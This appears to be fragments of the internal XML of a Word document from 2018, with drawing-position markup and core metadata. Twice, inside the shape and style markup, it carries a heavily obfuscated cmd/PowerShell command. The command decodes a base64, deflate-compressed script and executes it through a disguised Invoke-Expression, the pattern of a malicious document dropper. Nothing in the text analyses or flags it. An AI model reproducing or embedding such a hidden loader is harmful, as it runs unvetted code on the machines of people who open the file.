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AEEA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1685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7575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="210185" cy="11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MD C:\wINdows\systEM32\cMd   /c  "SEt   KQI= (nEW-oBJecT  SySTem.Io.StReaMReaDEr( ( nEW-oBJecT io.cOMPReSsion.DeFLAtEStReAm([iO.MEmORYstrEAm] [SyStEm.CONVeRT]::fROMBASe64STRing( 'PZBba8JAEIX/Sh4W1mDdVLBaXAK2FS8t2IpILfQlyY5mc9lJ48TYhvz3JlL7Ouc7H5xh0WbqGih76EcQkLUCEu/gPyUaDEk22ymXh0TZ2HF8jQRHEgEKrZyzWr3Ny9G6P/mL4yKNU98zqjCHhkmdWbZ4SdV+dwUIgtBgiahaRQzOcA63D/Hzqb++IgbwkGORCY3OcAuLox++/td1dswx9Iy+2DH5+hgNBlxsskRTh0+4Ldl2rS3X4vd3Ay4ZPZYuA3MaE6RZl3/ybpt3uYAzcLnHHLwg7LDoZ2VpY7VT7Yry74o1LxFTLE2CnprpBC7MjdUKbbk0J4yht2ykl4v0G08s68CjIKzq+hc=' ), [syStEM.iO.ComPReSsION.cOMPRESsIonMODe]::DeCoMPreSs) ) ,[TeXt.enCOdINg]::AsCII) ).REAdtOEnD( ) ^|^&amp;( ([strIng]$verBOsEpreFeRence)[1,3]+'X'-JoiN'')&amp;&amp;   PoWErshELL      ^&amp; ( \"{0}{1}\" -f'SET-ItE','m' )  ('Va'  +'RI'+ 'AbLE:jW1V') (    [tYpE](\"{1}{0}{2}\" -f'nVi','E','rONMENT')   )   ;    ^&amp;(  ${En`V:`comS`PeC}[4,24,25]-join'' )(  (  (    . ( \"{1}{0}{2}{3}\" -f'-ch','gEt','IlDiT','EM'  )  (  'vA' + 'rI'+'aBle:jW1v' )  ).VALue::(  \"{3}{0}{1}{4}{6}{5}{2}\" -f 'Vir','On','BlE','gEten','Me','vaRIa','NT'  ).Invoke(  'kqi',( \"{0}{2}{1}\" -f 'pro','sS','CE' )  ) )  )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-71.25pt;mso-position-vertical-relative:text;margin-left:-7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MD C:\wINdows\systEM32\cMd   /c  "SEt   KQI= (nEW-oBJecT  SySTem.Io.StReaMReaDEr( ( nEW-oBJecT io.cOMPReSsion.DeFLAtEStReAm([iO.MEmORYstrEAm] [SyStEm.CONVeRT]::fROMBASe64STRing( 'PZBba8JAEIX/Sh4W1mDdVLBaXAK2FS8t2IpILfQlyY5mc9lJ48TYhvz3JlL7Ouc7H5xh0WbqGih76EcQkLUCEu/gPyUaDEk22ymXh0TZ2HF8jQRHEgEKrZyzWr3Ny9G6P/mL4yKNU98zqjCHhkmdWbZ4SdV+dwUIgtBgiahaRQzOcA63D/Hzqb++IgbwkGORCY3OcAuLox++/td1dswx9Iy+2DH5+hgNBlxsskRTh0+4Ldl2rS3X4vd3Ay4ZPZYuA3MaE6RZl3/ybpt3uYAzcLnHHLwg7LDoZ2VpY7VT7Yry74o1LxFTLE2CnprpBC7MjdUKbbk0J4yht2ykl4v0G08s68CjIKzq+hc=' ), [syStEM.iO.ComPReSsION.cOMPRESsIonMODe]::DeCoMPreSs) ) ,[TeXt.enCOdINg]::AsCII) ).REAdtOEnD( ) ^|^&amp;( ([strIng]$verBOsEpreFeRence)[1,3]+'X'-JoiN'')&amp;&amp;   PoWErshELL      ^&amp; ( \"{0}{1}\" -f'SET-ItE','m' )  ('Va'  +'RI'+ 'AbLE:jW1V') (    [tYpE](\"{1}{0}{2}\" -f'nVi','E','rONMENT')   )   ;    ^&amp;(  ${En`V:`comS`PeC}[4,24,25]-join'' )(  (  (    . ( \"{1}{0}{2}{3}\" -f'-ch','gEt','IlDiT','EM'  )  (  'vA' + 'rI'+'aBle:jW1v' )  ).VALue::(  \"{3}{0}{1}{4}{6}{5}{2}\" -f 'Vir','On','BlE','gEten','Me','vaRIa','NT'  ).Invoke(  'kqi',( \"{0}{2}{1}\" -f 'pro','sS','CE' )  ) )  )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39:00Z</dcterms:created>
  <dc:creator>Piper-PC</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-07T11:39:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>